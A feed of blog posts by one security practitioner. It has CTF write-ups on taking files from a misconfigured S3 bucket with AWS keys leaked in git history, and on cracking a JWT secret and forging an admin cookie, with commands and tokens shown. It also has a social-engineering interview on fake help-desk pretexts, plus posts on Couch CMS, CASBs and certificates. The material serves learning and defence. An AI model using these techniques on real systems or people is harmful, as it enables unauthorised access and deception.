DEV Community: Antoinette Maria

AWS and Messy Git Practices: SecDSM March MiniCTF Solution

Antoinette Maria — Fri, 16 Mar 2018 04:02:07 +0000

Originally posted on antoinettestevens.com

I finally made it back to SecDSM after missing a month. I don't have a solution for February's MiniCTF, but it involved machine learning, CAPTCHA brute-forcing, and scripting. Unfortunately, I was busy preparing for a large event that I planned on March 1 and didn't have time to dedicate obsess over this challenge even though I found it really interesting.

The March SecDSM MiniCTF was a lot of fun and I learned about AWS cli and the importance of making sure you're using the most up-to-date versions of a tool. Let's take a look together. I'll try my best to walk through this and explain the thought patterns that I had as I go along. I should preface this by saying that I have never worked with AWS before. I've only read about it and saw a talk once at a security conference.

Recon

Visiting http[s]://portfolio[.]xbcw[.]net shows a fairly innocuous website. There aren't any fields to input text so I immediately ruled out about half of the web exploits that I know of, mostly injections. The only thing to do is begin browsing around the site. I use a Chrome browser, so I tend to browse with 'Inspect' open to look at files and network connections. I try to see if there's a robots.txt and get an error in the form of an XML files. That seemed weird to me since I usually just get a normal 404 page if a page doesn't exist. Moving on, I noticed that the icons at the top are for LinkedIn (doesn't go anywhere), a Github Repo, and a link to a PDF resume. I look at the PDF and don't see anything particularly special. I decided to begin inspecting the Github repo because I figured I'd be able to find out more about the deployed code, if nothing else.

The README for the repo is uninteresting, so I started clicking through files without really knowing what I was looking for or where to start. After a few minutes, I decided to go through the commits. I can't fully rationalize why, other than saying that I figured it would be helpful to know what the repo owner changed or removed just in case it gave me a hint about what I should look for on the website. At this point, I still don't know it's AWS.

Going through the commits on the repo and dots start to connect as I realize there are some very interesting things hidden in the commits for this project.

The first thing I found was this:

Now, I didn't know what it meant but the word 'bucket' is how I knew we were dealing with AWS. In the future I'll probably be able to recognize it faster but, in that moment, that's what did it. ¯_(ツ)_/¯

I hear about Amazon S3 Buckets being improperly configured and vulnerable all of the time. It's a popular topic among developers, so I knew this would probably be something like that. Whenever I feel like I have a pretty strong grasp on my goal, my next step is always to Google it. That resulted in me finding an article from Rhino Security Labs, Penetration Testing AWS Storage: Kicking the S3 Bucket.

I browsed to the S3 URL and find XML listing all of the content for this bucket...including a file called secrets.zip.

And now I'm like...

I do a wget on that zip file (you need pzip) and find out that it is password protected. A strings on the zip will reveal that there is a file called secrets.txt, but nothing resembling a password here. This is where things get rocky for me.

Random observations from recon:

Somewhere in this I tried Wireshark. It wasn't until I was filtering the IP address that I remembered that it was useless because the site is HTTPS and the traffic is encrypted.

While looking at the code, I noticed that the names of the images used on the webpage were named things like "gotcha", just in case people thought the images were a steg challenge I'm assuming. #The Exploit(?)

A lot of people's first instinct when faced with a password prompt is brute forcing it. In all of the CTFs I've seen (not that many really), they will usually do one of two things if they want you to brute force. They'll either provide (or hide it somewhere for you to find) you with a wordlist or make some type of pun about a popular wordlist. Otherwise, brute forcing usually isn't the answer. Check out this article from Better Buys to learn about the time it takes to attempt to blindly brute force a password.

Looking back at the commit I found for lambda-upload-portfolio.py, there's a comment that mentions that the password "will be in the parameter store under the filename". I have NO CLUE what that means, so I Google again and eventually find an article on Medium explaining how to access the parameter store. It's exactly what I need. I go to the AWS CLI (installed somewhere in this process with apt-get) and I get an error saying I have to run aws configure first. The aws configure command requires me to know the access key ID and access key secret for the S3 bucket. Well Shit. I don't know that or how to find it. I go back to looking around the Git commits after minutes of banging my head against the wall, thinking maybe I missed something. And then...

And this is why you should always be very careful when committing to a public repository. Oh well. Now I can configure the AWS CLI and do what I need to do. I follow the instructions from the Medium blog and run into a problem. get-parameters is missing. It doesn't exist. I figure that I must be doing something wrong and try other things with no luck. Eventually someone else gets the flag before I do and they mention that they used get-parameters.

I run aws --version and sure enough I'm not using the most up-to-date version, the version I'm using doesn't have the get-parameters command and other commands yet. When I got home I uninstalled awscli completely, updated my repos, added the suggested repo from the awscli documentation, and reinstalled awscli. I could finally see the get-parameters command.

antoinette@dev:~/secdsm/march$ aws ssm get-parameters --names secrets.zip
{
    "InvalidParameters": [], 
    "Parameters": [
        {
            "Version": 1, 
            "Type": "String", 
            "Name": "secrets.zip", 
            "Value": "Dodongo Dislikes Smoke"
        }
    ]
}

While reading about Parameter Stores, I learned that the parameter store will store values in key:value pairs. The --names flag on the command is 'secrets.zip' because the comment in the python script mentioned that the pw was under the filename. Meaning in a key:value pair, the filename was the key and the pw was the value.

Finally, I pasted the password, unzipped the file, and printed it out the contents of secrets.txt.

antoinette@dev:~/secdsm/march$ cat secrets.txt 
flag{iTsAsecReTtoEverYBodY}

Moral of the story: Make sure your programs are the latest version so that you don't get screwed.

Oh well. You win some. You lose some. Hope you found this helpful! Leave your questions and comments below.

Why The F**k Won't You Answer My Email?

Antoinette Maria — Wed, 06 Dec 2017 16:20:22 +0000

I'm currently on a project to POC a product from a bunch of different vendors. These products require integration with tools that my team doesn't manage which means (you guessed it!) I have to talk to and work with people from different teams. We are on fairly strict timelines with these products due to licensing and milestones set by the project team, so I need to get things integrated as soon as possible so that I can get the products working and do my analysis on their performance.

This brings me to an unnamed employee that we'll call "Alex", because that is a gender neutral name. Alex is the contact I was given on a team that manages a software we need these product to monitor for the POC. However, Alex won't answer my emails asking about getting the integration set up. I've sent a follow up email every day for the past 3 days and on the last email I cc'd our project manager and my leader. I'm beyond frustrated at this point, because this isn't this first time Alex has done this. I've had to reach out to this person before for help with their software and they never responded then either. That previous issue was less of a priority and I didn't feel the need to follow up, but now it just seems ridiculous.

Update! Alex finally answered me after the email that cc'd my leader and PM

For those of you who have been in my situation, what did you do? How did you get an unresponsive person (who might be blocking your project) to respond to your emails?

Couch CMS and the lazy developer

Antoinette Maria — Thu, 21 Sep 2017 00:01:35 +0000

I do not claim to be a developer, not a good one at least. In fact, I think it would almost insult other developers to call myself one. My only in-depth development experience, aside from writing some smaller tools for work, is as web developer for a start up in college. I worked with Wordpress (written in PHP) and later with Magento and coding with Liquid. I was okay with it but it taught me how tedious working with a CMS can be. Now, I run Reboot Iowa, a non-profit I founded to teach basic computer programming concepts and encourage technical literacy. We designed and built our own website and it looks great (with the exception of a few edits that need to happen on the Donate page, hey...I'm honest about it). The downside is that it is completely static which is not helpful for loading information about upcoming workshops and events dynamically. It's also a pain to update anything, which happens pretty often when you're a budding organization of any kind.

Enter Couch CMS

I spent a few days Googling some solutions for a lightweight CMS. I really didn't want to have to write a Wordpress theme or start all over with a new website while integrating a CMS. And it isn't because I don't think I can do it, but I'm pretty lazy. As I said before, I don't consider myself a developer and so it takes me longer than necessary to figure out everything and I just don't want to spend the time. Enter Couch CMS, a CMS for lazy people like me. Easy to set up and use and even comes with an admin panel. Prayers answered. Now, don't get me wrong. I can see how this tool would be totally useful for non-technical people with a need and being non-technical doesn't make them lazy. I'm calling myself lazy because I have the technical skill and knowledge to master a more robust CMS or even use a framework to build my own and simply choose not to.

I used MAMP to set up a local dev environment on my laptop to test out Couch. Couch CMS is written in PHP, a requirement I had for any solution I ended up using because it's the web language I'm most comfortable with. PHP was the first web language I learned, so it's close to second nature now.

I really liked that I could easily plug in dynamics pieces to a static site. All I had to do was require a file from the Couch directory (couch.php) and invoke at the end of the file. I eventually used it to easily update the bios for myself and my board members and to update various fields such as our 'About Us', 'Vision and Mission', and various other texts that might change in the future. My favorite part was being able to have upcoming events appear on the site and disappear after the date of the event passed. Now Couch is running on our production Reboot Iowa website and it's working out well so far. I still need to add in the necessary code to make our Announcements and News dynamic, but..well... I'm lazy remember?

A Little Taste

Here's a sample of how I added a dynamic events section to the homepage of Reboot Iowa's website.

I began by defining a template for an event in a file called events.php. With this template, an event object appears in the admin panel.

// events.php
<?php require_once( 'couch/cms.php' ); ?> 
<cms:template title='Event' clonable='1' > 
    <cms:editable name='event_description' type='richtext' />
    <cms:editable name='event_image'
        crop='1'
        width='610'
        height='150'
        type='image'
    />
    <cms:editable name='location' label='Location' type='text' />
    <cms:editable name="event_link" label='Event Sign Up Link' type='text'/>

    <cms:editable name="start_time" label="Time From (24 Hrs)"
      opt_values=' Unspecified |
                  00:00 | 00:30 | 01:00 | 01:30 | 02:00 | 02:30 | 03:00 | 03:30 |
                  04:00 | 04:30 | 05:00 | 05:30 | 06:00 | 06:30 | 07:00 | 07:30 |
                  08:00 | 08:30 | 09:00 | 09:30 | 10:00 | 10:30 | 11:00 | 11:30 |
                  12:00 | 12:30 | 13:00 | 13:30 | 14:00 | 14:30 | 15:00 | 15:30 |
                  16:00 | 16:30 | 17:00 | 17:30 | 18:00 | 18:30 | 19:00 | 19:30 |
                  20:00 | 20:30 | 21:00 | 21:30 | 22:00 | 22:30 | 23:00 | 23:30 |'
      type='dropdown'
    />

    <cms:editable name="end_time" label="Time Until (24 Hrs)"
      opt_values=' Unspecified |
                  00:00 | 00:30 | 01:00 | 01:30 | 02:00 | 02:30 | 03:00 | 03:30 |
                  04:00 | 04:30 | 05:00 | 05:30 | 06:00 | 06:30 | 07:00 | 07:30 |
                  08:00 | 08:30 | 09:00 | 09:30 | 10:00 | 10:30 | 11:00 | 11:30 |
                  12:00 | 12:30 | 13:00 | 13:30 | 14:00 | 14:30 | 15:00 | 15:30 |
                  16:00 | 16:30 | 17:00 | 17:30 | 18:00 | 18:30 | 19:00 | 19:30 |
                  20:00 | 20:30 | 21:00 | 21:30 | 22:00 | 22:30 | 23:00 | 23:30 |'
      type='dropdown'
    />

    <cms:editable name='end_date'
        label='Event End Date (if multi-days event)'
        desc='Enter date in yyyy-mm-dd format e.g. 2010-12-31'
        type='text'
        validator='regex=/(?:19|20)\d\d-(?:0[1-9]|1[012])-(?:0[1-9]|[12][0-9]|3[01])/'
        separator='#'
        validator_msg='regex=Incorrect date format'
    />
</cms:template>
<?php $title="Event"; include('header.php'); ?>
<div class="row" >
    <div class="col-sm-12" style="margin-top:35px;">
        <h2 style="margin-left:10px;">Upcoming Events</h2>
        <div class="row">

        </div><hr>
        <div class="row">

        </div>
    </div>
</div>
<?php include('footer.php'); ?>
<?php COUCH::invoke(); ?>

After creating the template and creating some events, I added the necessarily code to the index file to display information about upcoming events.

// index.php
...
...
...
<h2 style="margin-left:10px;">Announcements and Upcoming Events</h2>
        <div class="row">
            <div class="col-sm-3">
                <p class="lead section-lead"><i class="fa fa-calendar fa-2x" aria-hidden="true" style="padding:10px;"></i> <strong>Events </strong></p>
            </div>
            <div class="col-sm-9">
                <cms:set today="<cms:date format='Y-m-d' />" />
                <cms:pages masterpage='events.php' orderyby='end_date' order='asc'>
                <cms:if today lt end_date>
                  <p class="lead section-lead" style="/*margin-left:10px;*/"><cms:show k_page_title /> | <cms:date end_date format='F j' /> </p>

                  <p style="margin-left:10px;">
                    <cms:show event_description />

                      Time: <cms:date start_time format='g a' />-<cms:date end_time format='g a'/></br>
                      Location: <cms:show location />
                      <cms:if event_link !='Unspecified'>
                        <br><a target="_blank" href="<cms:show event_link />">Sign up Here</a>
                      </cms:if>
                  </p>
                </cms:if>
                </cms:pages>
            </div>
...
...
...

You'll notice I set a variable today, done by using the cms:set tag, to compare the event date with the current date in order to determine which events to show.

                <cms:set today="<cms:date format='Y-m-d' />" />
                <cms:pages masterpage='events.php' orderyby='end_date' order='asc'>
                <cms:if today lt end_date>

The many tags, such as cms:set and cms:if, allow me a small range of flexibility when working with the Couch to display information that I really appreciate.

Setup documentation can be found here. In short, all you do is unzip a folder and place it in a directory. After updating the config file with the credentials for your SQL database, you navigate to the admin panel, complete installation, and you're good to go. I won't get into all of the details, but if you'd like to know more about CouchCMS, they have really good documentation. I used to documentation as a guide to figure out everything I needed.

I'm more curious to know about other lightweight CMS's you guys have heard about or tricks you've picked up when running a dynamic site to make it a little easier to use. If you end up trying out Couch, let me know what your think.

Monitoring The Cloud

Antoinette Maria — Mon, 28 Aug 2017 20:50:14 +0000

I'm trying to get better about describing to non-security people what it is I do for work. So I'm going to start writing these little posts about different tools we use so that I can reference them later.

Many companies, both small and large, are beginning to move towards cloud based solutions, such as Salesforce, Box, AWS,etc, to meet the different needs of the company. With the growth of cloud solutions as enterprise solutions, concerns surrounding the security of customer data has grown as well. Companies want to know what data is being stored in the cloud, who has access to that data, and what they can do with the data. This is where a CAS or CASB enters into the equation. A Cloud Access Security Broker is a fairly new technology that allows companies to monitor, alert, and sometimes enforce policies in their cloud solutions. The main use cases surrounding CASBs are data loss prevention (DLP), shadow IT (the detection of cloud applications that have not been approved for use), and privilege abuse.

There are three different types of CASB solutions available: API-based, cloud-based, and hybrid.

API-Based Solutions
API based CASBs are out of band solutions that rely on pulling information via the APIs offered by the cloud vendor in use. For example, an API based CASB will pull logs from Salesforce using the Salesforce API. If the API doesn't capture a particular event then it won't be visible to the CAS-B either. The advantages of the API based solution is that you don't have any network latency, low impact to end users, and visibility of IaaS and PaaS (rather than just SaaS). The disadvantage to API based solutions is the lack of real time prevention. API based CASBs don't enable administrators to stop a transaction as it happens. It's strictly reactive.

Proxy-Based Solutions
A proxy based CASB uses a forward or reverse proxy to tunnel user traffic through the CASB solution for monitoring and alerting. This solution is really good for companies whose end users use managed devices. The problem with the proxy-based solution is that there can be a pretty significant network latency and it only works for SaaS solutions. Proxy based solutions are also a central point of failure, creating an opportunity for high user impact should something go wrong. However, in contrast to the API based solution, proxy based CASB solutions allow you the opportunity to enforce policy as the violation occurs. This can be invaluable for companies who use applications where data exfiltration is a big concern (i.e. Salesforce or OneDrive).

Hybrid
It's the best of both worlds. Some of the disadvantages still exist but the impact is reduced with advantage of having both solutions rolled into one.

A CASB isn't...

a replacement for a SIEM solution.
A CASB should not be looked as a replacement for a SIEM. The features of a SIEM far out weigh anything the CASB is capable of in terms of monitoring logs.

a replacement for a DLP solution.
Many companies turning to CASBs to monitor their cloud apps are doing so because they need to implement DLP for cloud. That, however, isn't a reason to forget about DLP outside of SaaS applications.

a replacement for a proxy or web gateway.
A CASB isn't meant to proxy all end user traffic. It's only used to monitor the traffic for the cloud applications that need to be monitored.

The CASB should be used in conjunction, not in place of, all of these solutions. A CASB can provide logs (visibility) into cloud applications and assist existing DLP solutions.

As I mentioned before, this a fairly new space in the security world. Many solutions are still maturing and evolving. I believe in the future most of the products offered in this space will be hybrid solutions to better fit a larger share of the market. Either way, if your company has a large chunk of data being stored in the cloud there's a good chance it will soon use a CASB to monitor that data in the near future.

Forging JSON Web Tokens To Win a Prize

Antoinette Maria — Thu, 27 Jul 2017 03:02:51 +0000

// Detect dark theme var iframe = document.getElementById('tweet-888164176404918278-702'); if (document.body.className.includes('dark-theme')) { iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=888164176404918278&theme=dark" }

I received a screenshot of the above tweet from my teams intern. We're planning to attend BSides Augusta this year, so immediately everything gets thrown to the side so that I can solve (what I thought would be) a quick and easy challenge. It was neither, quick or easy. So I'm going to walk you through the 2-hour process of trying to solve this challenge. I had some help so that will be mixed in with my thoughts as well.

The Easy Part

Looking at the string of text, it looks like hex. I threw it into a hex to ascii converter online and got gibberish. I looked at the string for a minute and noticed that the first few bytes looked really familiar. 1f8b08 is the file signature for a gzip file. Let the record show, that I actually realized that the first few bytes were special on my own. I used Google to verify, but I am proud of myself for even knowing that since it wasn't knowledge that I actively knew I possessed.

I put the hex into a hex editor (also found online) and downloaded the zip file. If you do a zcat on the file, it prints out an IP address.

zcat is a handy command line tool to cat or print to the console, the contents of a zip file without decompressing the file.

~$ zcat test.gz
35.184.14.24

The Not-So-Easy Part

Visiting that IP address leads to..

Right away I noticed that the site is running over port 80 a.k.a no HTTPS. Also, due to the nature of what I'm doing (trying to hack something), I knew it was probably vulnerable in some way. If you try to brute force it, you'll get a message saying that you can't do that. Below is what happens if you try to enter 'Admin' as the user and 'admin' as the password.

I used the 'Inspect' feature of Google Chrome to look at the source code.
There's a javascript file called 'custom.js' and inside of it I could see the handling for the login form and also a registration form that seems to be hidden and can only be accessed by the admin. Hmm... This was my brick wall. So everything beyond this point is largely based on guidance I received from the amazing security community I'm apart of in my city, SecDSM.

Telnet

Telnet is a command line tool that can be used to manually communicate with a server over a specified port. For example, if you want to send an HTTP GET request manually or specially craft one yourself, you can use telnet to do that.

$ telnet 35.184.14.24 80
Trying 35.184.14.24...
Connected to 24.14.184.35.bc.googleusercontent.com.
Escape character is '^]'.
GET /home.html HTTP/1.0

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 54
Set-Cookie: bsides_augusta_2017=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3N1ZWQiOiIyMDE3LTA3LTIwIDE2OjI0OjIwLjUyMjY0NSIsInVzZXIiOiJndWVzdCJ9.akXnslG9494KsLHyRf6pJBlCAVgmZSNBMwOE38jCF2s
Server: Werkzeug/0.12.2 Python/2.7.12
Date: Thu, 20 Jul 2017 16:24:20 GMT

<html><script>window.location.href='/'</script></html>Connection closed by foreign host.

The response from the server gave me a lot of information. I saw that the server is setting a cookie called bsides_augusta_2017 and the value looks like a base64 encoded string.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 decodes to {"alg":"HS256","typ":"JWT"}
eyJpc3N1ZWQiOiIyMDE3LTA3LTIwIDE2OjI0OjIwLjUyMjY0NSIsInVzZXIiOiJndWVzdCJ9 decodes to {"issued":"2017-07-20 16:24:20.522645","user":"guest"}

From this I knew the type of algorithm and cookie type, as well as what user we're showing up as; guest.

If You Give A Site A Cookie...

We need to find a way to forge a cookie that tells the server we're the admin. This is achieved in four steps.

Step 1: Get the Session Cookie With a GET

$ telnet 35.184.14.24 80
Trying 35.184.14.24...
Connected to 24.14.184.35.bc.googleusercontent.com.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2091
Set-Cookie: bsides_augusta_2017=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3N1ZWQiOiIyMDE3LTA3LTI3IDAyOjExOjA1LjEwMjYzMCIsInVzZXIiOiJndWVzdCJ9.WtsckOvZlwBNlE4vJuvA9sK0LAZ0zQ47161ogfrZ1Vw
Server: Werkzeug/0.12.2 Python/2.7.12
Date: Thu, 27 Jul 2017 02:11:05 GMT

Step 2: Get The Secret Key
This site uses JSON Web Tokens. JWTs are signed using a secret key, so I needed to find out what that is in order to forge the cookie. Brendan Rius' JWT Cracker is what I used to get the key in a matter of seconds.

~/c-jwt-cracker$ ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3N1ZWQiOiIyMDE3LTA3LTI3IDAyOjExOjA1LjEwMjYzMCIsInVzZXIiOiJndWVzdCJ9.WtsckOvZlwBNlE4vJuvA9sK0LAZ0zQ47161ogfrZ1Vw

Secret is "l3et"

Step 3: Edit the Cookie
To edit the cookie, I used jsonwebtoken.io with the secret I uncovered using jwtcrack.

Step 4: Insert The New Value For Your Cookie
There are multiple ways to do this. I have a plugin on my Chrome Browser called Edit This Cookie that allows me to edit the value of a cookie directly. I used this after verifying that the value was correct with telnet.

$ telnet 35.184.14.24 80
Trying 35.184.14.24...
Connected to 24.14.184.35.bc.googleusercontent.com.
Escape character is '^]'.
GET /home.html HTTP/1.1
Host: 35.184.14.24
Cookie: bsides_augusta_2017=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3N1ZWQiOiIyMDE3LTA3LTI3IDAyOjExOjA1LjEwMjYzMCIsInVzZXIiOiJhZG1pbiIsImp0aSI6IjI1NzU0OGIxLTU4MDctNDZiNi05ZDBmLTBkY2FiNzYyM2Y0NSIsImlhdCI6MTUwMTEyMTU2MCwiZXhwIjoxNTAxMTI1MTYwfQ.mHrODuQhBBVcC954lkquc5xOVNZI0fwMuIVNjKD0EAY

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2974
Server: Werkzeug/0.12.2 Python/2.7.12
Date: Thu, 27 Jul 2017 02:13:41 GMT

...
...
...
<!-- Created by Christopher Davis. https://www.linkedin.com/in/christopher-davis-4817b392/ -->
...
...
...                        
                    <h3>&nbsp&nbspChallenge Success!</h3>
                    <p>Good job on solving the challenge and being the #11 player to solve the challenge! As one of the first 5 players, you will receive a prize at Bsides August 2017.</br>Simply Provide your details below and someone will contact you.</br> Please do NOT register unless you are attending Bsides Augusta on Sep 16 2017. Tickets can be bought <a href="https://www.eventbrite.com/e/bsidesaugusta-2017-tickets-35553549624?ref=ecount">here</a>.</p>
...
...
...
Connection closed by foreign host.

Success

Welp, that's all folks. Replace #11 with #3 and you've got exactly what I saw.

// Detect dark theme var iframe = document.getElementById('tweet-888075099613605889-128'); if (document.body.className.includes('dark-theme')) { iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=888075099613605889&theme=dark" }

Final Thoughts

A few of the other guys from SecDSM also started working on this challenge after I asked for help. One of them use BurpSuite to forward the forged cookie to the server (just in case you were curious about alternative ways). I'm not well versed in BurpSuite, but I have a feeling it'll be handy for future challenges that involving web vulnerabilities.
Another one of the guys is the one who found jwtcracker and the token forgery site. I asked him later how he knew to look for these. He said he didn't recognize the webserver used (As seen in the HTTP response from the telnet commands Server: Werkzeug/0.12.2 Python/2.7.12) and Googled session handling for it. I did the same and you're eventually directed toward JSON Web Tokens. The lesson here is to take the time to pay attention to everything.
This challenge was far more difficult than I initially thought, but it was also extremely beneficial. I've never had to forge a cookie and now I know how and now you do too. Give it a shot.

BSides Augusta is September 16th in Augusta, Georgia. Get more information on their website.

Did You Know There Are Different Types of Certs for HTTPS?

Antoinette Maria — Mon, 24 Jul 2017 20:43:17 +0000

Can you tell the difference between the two images below (beyond the fact that they're different websites)?

Do you see where Twitter has 'Twitter, Inc [US]' next to the green padlock and Google only has 'Secure'? That means Twitter is using an EV or Extended Validation certificate, whereas Google is only using a DV or Domain Validation certificate. I've only vaguely noticed that certain HTTPS sites have worded other than 'Secure' next to the green padlock and it wasn't until I read Troy Hunt's blog, On The (Perceived) Value of EV Certs, Commercial CAs, Phishing and Let's Encrypt, that I knew what that meant.

I won't rehash everything he said because he covered everything really well. You should read it if you have the time. However, there's a quote from his blog posts that sums everything up perfectly.

"Whilst DV certs give us assurance that we're communicating with the domain we think we are, it's EV certs which give us confidence we're communicating with the organisation we think we are."

Domain Validation certificates require the certificate requester to prove that they own the site they're acquiring the certificate for, which isn't difficult to do. The purpose of an EV cert is to provide an extra layer of confidence. Someone could easily acquire a DV cert for a phishing site, but an EV certificate requires proof that they are the organization they're claiming to be.In fact, a human auditor has to perform an independent review of a site before an EV cert can be issued. I cannot just buy a domain, run a Paypal phishing site, and acquire an EV cert that says I'm Paypal.

What does this mean to you? Maybe nothing. It was mentioned that we, security professionals, should begin to change the way we condition our users. So that instead of inherently trusting the green padlock, we train users to recognize the difference between EV and DV certificates and change behaviors based on that. That isn't necessarily plausible at the moment since many top 100 Alexa sites forego EV certs (i.e. Google). But it is possible to begin to pay attention when we see an EV cert for a HTTPS site and change behaviors when we no longer see that cert.

For example, Bank of America has an EV cert and I've always subconsciously known that because it was the first time I wondered why the organization name was next to the green padlock. If that were to suddenly change one day, I'd immediately become suspicious.

So, will you begin to look out for these two types of certs now? Did you know about EV and DV certs before or is this your first time hearing about it too?

You'd Probably Willingly Tell This Woman Your Password

Antoinette Maria — Tue, 27 Jun 2017 20:22:25 +0000

Last weekend I traveled to Minneapolis for BrrCon and BSidesMSP, two security conferences happening back-to-back. During BrrCon, I attended a talk called 'Social Engineers are Jerks. Equipping Your Staff to Deal With Them and Get You in the Loop.' presented by Jen Fox. Find out more about the talk here. Jen's was far and away my favorite talk at BrrCon. She talked about how she can use social engineering to extract information from people. She uses her talents as a consultant for different companies. Following her talk, I sat down with Jen for an interview. I edited a few of her responses for readability below. At the very end, I posted a similar talk that she did at a different conference from 2015.

Some Context During her presentation, Jen played a few calls. One of them involved a young woman who knew that something suspicious was going on because she'd been asked for her password over the phone and asked Jen a bunch of questions about who she was and even looked her up in the system. After not finding Jen in the system she asked if she could return Jen's call later. Even though the woman was clearly stressed out, she passed the social engineering test. Others were not so successful.

In your own words, what is 'social engineering'?

I think the typical definition of social engineering really is that you're attempting to influence somebody to do something or take some action that may or may not be in their best interest. That's actually from Chris Hadnagy's book about social engineering and it's a definition I agree with.

How did you get into social engineering?

Actually, my husband. He wanted to do the social engineering capture the flag at DEFCON in Las Vegas. They were trying to get both men and women to do the competition and you had a better chance of getting in as a guy if you had a woman also submit. I thought the idea was kind of horrifying because for that competition you're on a stage in a booth making phone calls in front of a packed room and everybody hears both sides of the phone call. Which is amazing to watch, terrifying to do. I don't even like making phone calls of any kind; I don't even like ordering pizza. So I was not extremely excited about the idea, but I really loved doing all of the research and I loved the challenge. We all had to submit flags or pieces of information we had to find for the competition. So I enjoyed doing that research and coming up with the pretext of the story I was going to use. What's going to be plausible? What would make sense? What do I need to do to get what I want? I loved that.

Note: If you aren't sure what DEFCON is, I'd like to point out that it is a big deal that Jen won their Social Engineering competition. The DEFCON black badge is highly coveted.

It's sound like you have a natural talent for it. How long ago was that?

Four years ago I did my first competition. And the third year I won.

What's your go to tactic?

The fake help desk call is one I do very consistently. If a company has not been getting social engineering assessments that should be the low bar, that people can resist a fake help desk call. I love the calls with the portals too. They're not complicated to do and they're hard to defend against. They're a common attack and no one is saying 'what's your password'. You just go to a website and log in with your credentials.

How do you stay in character during a call or situation that isn't going your way?

I always really strive to fail gracefully. What I don't want to do is just hang up mid-call. Like the one we heard, when she started peppering me with questions if I had just hung up because I was getting intimated that would absolutely be a flag. And that's the last thing I want, I don't want anybody being more suspicious than they need to be or they're inclined to be. I always try very hard even when somebody says 'no' and they're really shooting me down, I just do what you heard in the example with 'That's okay, I'll just put you on a list for follow up then.' and I end the call and get out.

Also, for pretext I do a lot of preparation. For the fake help desk call that you heard. I script that because that's not the area of IT that I came from so it's not like I just naturally know it. I just do my research and through Linkedin most of the time you can figure out what version of Windows they have, that's really not hard. Then I write a script, I might write a couple. I also do a lot of research surrounding who I say I am and what department. If I'm claiming to be from somewhere who do I say is my supervisor? If I'm claiming to be a third party consultant who do I say is my champion within the organization? I've done that, and you heard me dropping somebody, Kirsten, and everybody went 'Oooh. Okay. Yeah that make sense.' Some people don't resist at all and some do. Partly I'm always torn between rooting for them or getting my way. But I want them to do well because I want what's best for my client. It's hard when you can tell somebody is very stressed and you can tell they're struggling. It's hard in person too because you know, there's no question about it, 'I am causing the person to be very uncomfortable' which is the last thing 'regular' me is about.

What type of employees do you usually seek as targets? Call centers? Or people with a specific access?

All information is interesting to somebody.

It depends on the engagement. Sometimes the client really wants certain areas of the company or has certain types of the information they're concerned about. If they don't have anybody in particular in mind, I look at the kind of organization. What do they do? What are they likely to have? What's interesting? What's the most interesting thing about them and who has access? That can be a variety of departments. In IT, you have all of those admin privileges and a lot of elevated access to information in IT. The finance department, if they have one, is pretty interesting. Also, People who have access to a lot of customer data or maybe they have a lot of employees to HR might be interesting. All information is interesting to somebody. That's often a discussion I have with client as well, people take information they have access to for granted. [They'll say] 'well it's not a bank account number' but that doesn't mean it's not worth anything

Would it be feasible for a social engineer to go after someone who is internal facing, or doesn't normally have interactions over their office phone? Such as a developer? How do you get to someone if they don't really do 'phone'?

That's a good question. One of the challenges as a social engineer is just getting someone to answer the phone. You can spend a lot of time calling and calling and calling. It can be a long and tedious process. If there was a department I was really focused on, it would depend on the rules of engagement. Not all client want all the things. Sometimes they only want phishing or they're interested in having someone physically on site. In which case I have a different opportunity, [like seeing] if I can get into an area to plug something in and I've done that before. And it's one of those things where I go "oh gosh it shouldn't be this easy" but a place that's big enough, it's easy. Other department don't really pay attention IT. It can be pretty plausible if you're at a large enough place.

What did you do before you became a consultant?

I want people to have a good experience with technology because, at work, we don't really have a choice.

I started off my degree with professional technical writing. I got my first job in technical writing and wrote manuals for software. From writing to training because no one wants to talk to the users. From training, I saw a lot of shortcomings in how the software design process had come about. I'd talk to the users about what they do so that I could train them in a meaningful way and would know that the software doesn't do that. I was interested in how I could get to the part of the process to influence that. How does software get better? So then I became a usability analyst and then a high tech anthropologist. That was about focusing on the user; again, people and process. From there I did other business analysis. Then security started looking interesting and I got a graduate certificate in all the things. People and process have always been my thread. That's what has always mattered. I want people to have a good experience with technology because, at work, we don't really have a choice. It's not optional to use the systems we use. I really want things to work for people and work better for people. And even more so with all of the things on our phones and our apps, I don't want to see people post pictures of their drivers' licenses.

How can the average person 'resist' better?

I've been thinking about it a lot and 'what are some of the common elements of it'. A lot of thought around 'where are my boundaries?'. Saying 'no' to anything, it can be hard and very difficult for a lot of people. I think you have to understand where your boundaries are and knowing what's the line between 'okay' and 'not okay'and having a script for it. I'm an introvert, so for me, I'm much better off. I already kind of know what I'm going to do, which is why I script my calls. But I think it's like if you're talking to a young kid who is having trouble with someone at school. It's kind of the same thing, you coach them and say 'if he does that again, do this or say this'. That instills a great measure of confidence if know you just have a way to shut it down without causing a scene or being rude. Those are two things that some people are 100% okay with but so many people aren't. People can tell and that's where we get you. So having a couple of scripts to say 'I'm sorry we don't share that information with people', it just kind of sends the message and shuts it down. It's easy to repeat and people will move on.

Watch Jen's Circle City Con Talk

I don't have the video from her BrrCon talk but check out Jen at Circle City Con 2015

I Clicked On A Facebook Scam To See What Would Happen

Antoinette Maria — Mon, 05 Jun 2017 17:31:32 +0000

So, I'm scrolling through Facebook and suddenly...

And then I'm like...

Do you see what's immediately wrong here? To start, Delta Airline isn't going to give out two free tickets to anyone for its 33rd anniversary.

Next, look at that URL at the bottom of the image.

Sure, it's possible for Delta to own different websites. But if Delta Airlines were going to give out free tickets for anything it's safe to say it's for the purposes of marketing, meaning they would more than likely want to drive traffic directly to their main website located at Delta.com.

The Surface

Now I'm curious, so I pull up Wireshark and start sniffing my own traffic while I browse through the site.

It should be noted that I should have done this in a VM. It is very possible that it could have been a drive by malware attack, meaning my computer would have been infected as soon as I visited the site...aaaand later you'll see why this matters.

